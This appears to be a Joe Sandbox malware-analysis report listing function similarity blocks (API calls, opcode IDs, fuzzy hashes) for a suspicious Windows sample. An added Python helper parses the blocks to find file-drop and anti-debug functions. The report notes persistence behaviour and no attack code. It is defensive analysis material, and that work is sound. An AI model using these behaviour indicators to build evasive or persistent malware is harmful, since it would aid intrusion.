                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                  • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                                                  • Instruction ID: b019bdf3476ce867fce2c923c33156472654b06152447cb0e559d04746cdba66
                                                  • Opcode Fuzzy Hash: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
                                                  • Instruction Fuzzy Hash: 5C316F32618B8186EB648F65FC512AE73A0FB88755F540139EADD83B99DF3CD546CB00
APIs
Similarity
• API ID: _invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 3668304517-0
• Opcode ID: e3d741568b9ceeed1bb51d0fe396fe018f9d7fc5d1e3193d8a2ec51d497700c7
• Instruction ID: 9728cee1b89f12023f79a8a2184f5de9b757a23442cc2973564823e6066c5b9e
• Opcode Fuzzy Hash: e3d741568b9ceeed1bb51d0fe396fe018f9d7fc5d1e3193d8a2ec51d497700c7
• Instruction Fuzzy Hash: 90B1D332B24A8685EB10AF65E8662ED2371FF85789F501275EA8DC3B9ADF3CD540C304
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CA9FFAC4
  • Part of subcall function 00007FF6CA9F7934: GetCurrentProcess.KERNEL32(00007FF6CAA00CCD), ref: 00007FF6CA9F7961
Strings
Similarity
• API ID: CurrentProcess_invalid_parameter_noinfo
• String ID: *?$.
• API String ID: 2518042432-3972193922
• Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
• Instruction ID: e9c538e173386db847be3de76c06ac5169d0325aa8bf39c9a71a35c6206dfc92
• Opcode Fuzzy Hash: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
• Instruction Fuzzy Hash: DF51F662B25A9541EF10DFA1AC220BC77A4FB44BD9B444579EE9ED7B86EF3CD0428300
APIs
Similarity
• API ID: memcpy_s
• String ID:
• API String ID: 1502251526-0
• Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
• Instruction ID: b19a6abf79ab3cf30380ad83e561e562edb02d3a901e5450d188dd188a9ef562
• Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
• Instruction Fuzzy Hash: A1D1A032B183C687DB24CF55F19466AB6A1FB98785F148134CB8F97B44DE3DE8468B00
APIs
Similarity
• API ID: ErrorFormatFreeLastLocalMessage
• String ID:
• API String ID: 1365068426-0
• Opcode ID: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
• Instruction ID: 8dbaf0c3848696116701efc4805ffeb399a72890998284ff6fc9bcd9b114219c
• Opcode Fuzzy Hash: c27e05edbcf0c556cf9f4b9f4aa6354f64d9dc72ff0f252d3a2ededa039666af
• Instruction Fuzzy Hash: C2014F7171CB8282EB549F62B86517A7391FB8ABC6F084074EACEC7B45CE3CD5058B04
Strings
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
• Opcode ID: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
• Instruction ID: efa171a7dc90c568dae63b7a0cd9386ae1ea874f4e0ca32b621f0c6d50f9cecc
• Opcode Fuzzy Hash: 7c9d8364e7b62915daf92aecf888b4814fe01b6aae5fc02ec6e7aa2f3019df5b
• Instruction Fuzzy Hash: 8E310B22B2869145F7209F36BC157B97A91AB94BE4F148279EEADC7BC7CE3CD5018300
APIs
Similarity
• API ID: ExceptionRaise_clrfp
• String ID:
• API String ID: 15204871-0
• Opcode ID: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
• Instruction ID: e340ac78efc0fadfadf4ffc66805018743afec96c209bd385c5beb2e80b09428
• Opcode Fuzzy Hash: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
• Instruction Fuzzy Hash: 7FB16D73600B8A8BEB19CF29D85636C3BA0F744B49F15C962DA9E877A4CF39D452C700
APIs
Similarity
• API ID: FormatInfoLocaleNumber
• String ID:
• API String ID: 2169056816-0
• Opcode ID: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
• Instruction ID: b6d3f29213e6739ab374bd5370cbf5e6a27fbabbce6c4ab400b66b24649d4cdb
• Opcode Fuzzy Hash: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
• Instruction Fuzzy Hash: 6411DF32A18B8195E3258F51F8213F97360FF88B85F804176DA8D83664DF3CD146CB44
APIs
  • Part of subcall function 00007FF6CA9D24C0: CreateFileW.KERNELBASE ref: 00007FF6CA9D259B
  • Part of subcall function 00007FF6CA9D24C0: GetLastError.KERNEL32 ref: 00007FF6CA9D25AE
  • Part of subcall function 00007FF6CA9D24C0: CreateFileW.KERNEL32 ref: 00007FF6CA9D260E
  • Part of subcall function 00007FF6CA9D24C0: GetLastError.KERNEL32 ref: 00007FF6CA9D2617
• _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CA9D15D0
  • Part of subcall function 00007FF6CA9D3980: MoveFileW.KERNEL32 ref: 00007FF6CA9D39BD
  • Part of subcall function 00007FF6CA9D3980: MoveFileW.KERNEL32 ref: 00007FF6CA9D3A34
Similarity
• API ID: File$CreateErrorLastMove$_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 34527147-0
• Opcode ID: 820f54f5ecf705f04b13670ba967b2039b24beb0e250efc8748d6bebb935f937
• Instruction ID: f0f0305b26bccd78a1e0313ecd57afdbaa3050179f818a8ada01c21d0677a7cd
• Opcode Fuzzy Hash: 820f54f5ecf705f04b13670ba967b2039b24beb0e250efc8748d6bebb935f937
• Instruction Fuzzy Hash: 1991C023F28A4282EA10DF66E4662AE6361FB54BC5F504076EE8DD7B96DF3CD585C300
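The API ID line in each Similarity block is Joe Sandbox's condensed list of the calls a function reaches, and the APIs list above it gives the resolved call sites, including calls reached through subcalls. The block above (CreateFileW and GetLastError via 00007FF6CA9D24C0, MoveFileW via 00007FF6CA9D3980) is the kind of function worth pulling out of a listing this long when the report flags "Drops PE files to the startup folder". The following Python is an added triage helper, not part of the Joe Sandbox report or its IDA plugin: it parses these function blocks as laid out on this page and filters them by API keyword. It assumes that the field labels are stable across reports and that "$" separates groups of call names in an API ID, both inferred from this report rather than documented; the sample input is three blocks copied from this page with the repeated memory-dump lines trimmed.

```python
"""Triage helper for the per-function 'Similarity' blocks in a Joe Sandbox
report. Added example, not Joe Sandbox code. Assumed: '$' separates groups
of call names in an API ID, and the field labels are stable across reports.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class ApiRef:
    name: str                      # e.g. CreateFileW
    module: str                    # e.g. KERNELBASE
    ref: str                       # call-site address in the dump
    subcall: Optional[str] = None  # parent function for 'Part of subcall function' lines


@dataclass
class FunctionBlock:
    api_refs: list[ApiRef] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)  # '• Label: value' lines

    @property
    def api_id(self) -> str:
        return self.fields.get("API ID", "")

    @property
    def opcode_id(self) -> str:
        return self.fields.get("Opcode ID", "")

    def api_groups(self) -> list[str]:
        return [g for g in self.api_id.split("$") if g]


# 'Part of subcall function X: Name.MODULE(args), ref: ADDR' or 'Name.MODULE ref: ADDR'
REF_RE = re.compile(
    r"(?:Part of subcall function ([0-9A-Fa-f]+): )?"
    r"(\w+)\.(\w+)(?:\([^)]*\))?,? ref: ([0-9A-Fa-f]+)"
)
FIELD_RE = re.compile(r"^•\s*([A-Za-z ]+?):\s*(.*)$")
HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


def parse_blocks(text: str) -> list[FunctionBlock]:
    """Split report text into function blocks. A new block starts at an 'APIs'
    or 'Strings' heading once the previous block's Similarity section has been
    seen; a 'Strings' heading right after a block's own API refs stays inside it."""
    blocks: list[FunctionBlock] = []
    cur: Optional[FunctionBlock] = None
    seen_similarity = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in ("APIs", "Strings") and (cur is None or seen_similarity):
            cur = FunctionBlock()
            blocks.append(cur)
            seen_similarity = False
            continue
        if cur is None:
            cur = FunctionBlock()
            blocks.append(cur)
        if line == "Similarity":
            seen_similarity = True
            continue
        if line in HEADINGS:
            continue
        m = REF_RE.search(line)
        if m and not seen_similarity:
            cur.api_refs.append(ApiRef(m.group(2), m.group(3), m.group(4), m.group(1)))
            continue
        m = FIELD_RE.match(line)
        if m:
            cur.fields[m.group(1)] = m.group(2)
    return blocks


def functions_touching(blocks: list[FunctionBlock], *keywords: str) -> list[FunctionBlock]:
    """Blocks whose API ID groups or resolved refs contain any keyword (case-insensitive)."""
    kws = [k.lower() for k in keywords]
    hits = []
    for b in blocks:
        hay = [g.lower() for g in b.api_groups()] + [r.name.lower() for r in b.api_refs]
        if any(k in h for k in kws for h in hay):
            hits.append(b)
    return hits


# Constructed sample: three blocks copied from this report, with indentation,
# link residue and the repeated memory-dump lines trimmed.
SAMPLE = """\
APIs
Memory Dump Source
• Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: 5940ef1d6d2c32beaf7af9e8e0892e721e3d30544378453b8f42f9f5775f8da8
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF6CA9FFAC4
  • Part of subcall function 00007FF6CA9F7934: GetCurrentProcess.KERNEL32(00007FF6CAA00CCD), ref: 00007FF6CA9F7961
Strings
Similarity
• API ID: CurrentProcess_invalid_parameter_noinfo
• String ID: *?$.
• API String ID: 2518042432-3972193922
• Opcode ID: f96344909874f118cd7fc652812aee2de17a0b901a5c412331694f6fbd6e8fc4
APIs
  • Part of subcall function 00007FF6CA9D24C0: CreateFileW.KERNELBASE ref: 00007FF6CA9D259B
  • Part of subcall function 00007FF6CA9D24C0: GetLastError.KERNEL32 ref: 00007FF6CA9D25AE
• _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CA9D15D0
  • Part of subcall function 00007FF6CA9D3980: MoveFileW.KERNEL32 ref: 00007FF6CA9D39BD
Similarity
• API ID: File$CreateErrorLastMove$_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 34527147-0
• Opcode ID: 820f54f5ecf705f04b13670ba967b2039b24beb0e250efc8748d6bebb935f937
"""

if __name__ == "__main__":
    for b in functions_touching(parse_blocks(SAMPLE), "Debugger", "File"):
        print(b.opcode_id[:12], b.api_groups(), [r.name for r in b.api_refs])
```

Run it against a whole report by feeding the saved page text to `parse_blocks` instead of `SAMPLE`; keying hits on the Opcode ID lets you jump back to the matching disassembly in the report, and the `subcall` field tells you which parent function actually owns the file-drop or anti-debug call.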
APIs
Similarity
• API ID: ObjectRelease$CapsDevice
• String ID:
• API String ID: 1061551593-0
• Opcode ID: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
• Instruction ID: 9973414fa7fbf8b60882b34bbe1f1995d0271443d0d15f4cd6c1db9db2db8cef
• Opcode Fuzzy Hash: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
• Instruction Fuzzy Hash: 15816F32B18A4586EB20CFAAE4556AC7771FB88B89F004176DE4ED7725DF38E145C380
APIs
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
• Opcode ID: 5e1f820920c456f15e44ae9d5f0cc3b6f822566f542002a6e47536c5256bfc9c
• Instruction ID: 655b555e190385739fabde28a40f97404ecf187e140451afb6f92eb06b16873f
• Opcode Fuzzy Hash: 5e1f820920c456f15e44ae9d5f0cc3b6f822566f542002a6e47536c5256bfc9c
• Instruction Fuzzy Hash: 35018471D5D58289FA718F65B83A3B523905BE9307F4402B4D5DDC72A2CE3DA489CA04
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: 0
• API String ID: 3215553584-4108050209
• Opcode ID: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
• Instruction ID: cc5c6977c20ed0fab007959e4181686a65109dc757e7dc6711ce40aed3f34ccf
• Opcode Fuzzy Hash: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
• Instruction Fuzzy Hash: B2811722A3910242EBE89E15BC6A67D23D0EF50746F1494B9FD89C769BCF3DE802C340
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: 0
• API String ID: 3215553584-4108050209
• Opcode ID: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
• Instruction ID: a03ac53d26bba5f27fc27a06b4fc3105684356de419f09e04d54c1b9a7d44c49
• Opcode Fuzzy Hash: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
• Instruction Fuzzy Hash: E9712911A3C24246FBE48E197C6A27D2390DF41746F1495BEFDC9CB687CE2DE8468741
Strings
Similarity
• API ID:
• String ID: gj
• API String ID: 0-4203073231
• Opcode ID: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
• Instruction ID: 0a5e52077a3c661b30933d9d2621fe10a39e13e3f08566596d97fddae8bfbf76
• Opcode Fuzzy Hash: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
• Instruction Fuzzy Hash: 34518137B286908BD714CF25E411A9AB3A5F388758F455126EF8A93B05CB39E945CF40
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
                                                  • Instruction ID: 81c246f6ad73d1afd7d96665d2c78442644ea5e983717237cf35e4e7a1bd1f05
                                                  • Opcode Fuzzy Hash: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
                                                  • Instruction Fuzzy Hash: CA41C322724A44C5EF44CF6AE8651A973A1B758FD4B499036EF8DC77A5DE3CD482C340
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID: HeapProcess
                                                  • String ID:
                                                  • API String ID: 54951025-0
                                                  • Opcode ID: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                  • Instruction ID: 0de2881c0351a0951889220f539803fd76194f26eb135b85e0f3f21b6f3cd58b
                                                  • Opcode Fuzzy Hash: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                  • Instruction Fuzzy Hash: D2B09220E17A42C2EA0C2F927CAA25423A4BF88B02F9490B8C18D82320DE2C20B64705
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1df1e6e81a57214c8643d36be1bb9cde3812740f73d4ab830297bee2ffae98a2
                                                  • Instruction ID: 9c63a69134795beb1645287cee17ec02e90b99d0c814f385d2a218ff957c7115
                                                  • Opcode Fuzzy Hash: 1df1e6e81a57214c8643d36be1bb9cde3812740f73d4ab830297bee2ffae98a2
                                                  • Instruction Fuzzy Hash: 2D823663A286C186DB14CF28E4652BC3BA1F795B89F19817ACA8EC7387DE3DD445C350
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                                  • Instruction ID: 1a22b93838341ed3d45c24af63afc43ae6f390d0767e6201bc641d3a46161a28
                                                  • Opcode Fuzzy Hash: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                                  • Instruction Fuzzy Hash: 82627E9AD3AF9A1EE303A53954131D2E35C0EF74C9551E31BFCE431E66EB92A6832314
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 83a45c88a368d7276059de07aefbbc35b61cea5d64746511b72f3674958eea04
                                                  • Instruction ID: 2ecf3d5343da0a72361ce1b1a0204dc7acc1d9311ad959249505dfb59441bd30
                                                  • Opcode Fuzzy Hash: 83a45c88a368d7276059de07aefbbc35b61cea5d64746511b72f3674958eea04
                                                  • Instruction Fuzzy Hash: 128210B2A186C08ADB14CF28E4656FC7BA1F755B49F088176CA8DC7787DE3C9885C750
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
                                                  • Instruction ID: edf070f99c2c97a23499df4cc7cce6a4fcb603fb23b9d42f9780a40d4e862fb0
                                                  • Opcode Fuzzy Hash: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
                                                  • Instruction Fuzzy Hash: 9D22F3B3B206508BD728CF25D89AA5E3766F799344B4B8228DF4ACB785DB38D505CB40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
                                                  • Instruction ID: cb516183cdfd35956c4a96d04a52d3161e66b9e479674ba6ab8074a619d2e633
                                                  • Opcode Fuzzy Hash: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
                                                  • Instruction Fuzzy Hash: 8632D272A241918BE718CF24E5617BC37A1F794B49F058179DA8AC7B8ADF3CE854C780
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
                                                  • Instruction ID: 69fe0510e3e23855d481e4db98f75a42ddc8b2e6d98df0db1c61ca6c31c39fcf
                                                  • Opcode Fuzzy Hash: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
                                                  • Instruction Fuzzy Hash: F9C18DB7B281908FE350CF7AE400A9D3BB1F39878CB519125EF59A7B09D639D645CB40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff6ca9c0000_Y5kEUsYDFr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
                                                  • Instruction ID: 1ac4b282839c8ab4cd4ea89394ecbf2d977f14e273f1618a667c7b669a066542
                                                  • Opcode Fuzzy Hash: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
                                                  • Instruction Fuzzy Hash: 5EA15673E2819242EB15CE28E4267BA6791FB90746F054574DACAC7787CE3CE881C781
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146629845.00007FF6CA9C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CA9C0000, based on PE: true
                                                   • Associated: 00000000.00000002.4146577962.00007FF6CA9C0000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146707529.00007FF6CAA08000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA1B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146754329.00007FF6CAA24000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2A000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4146840622.00007FF6CAA2E000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
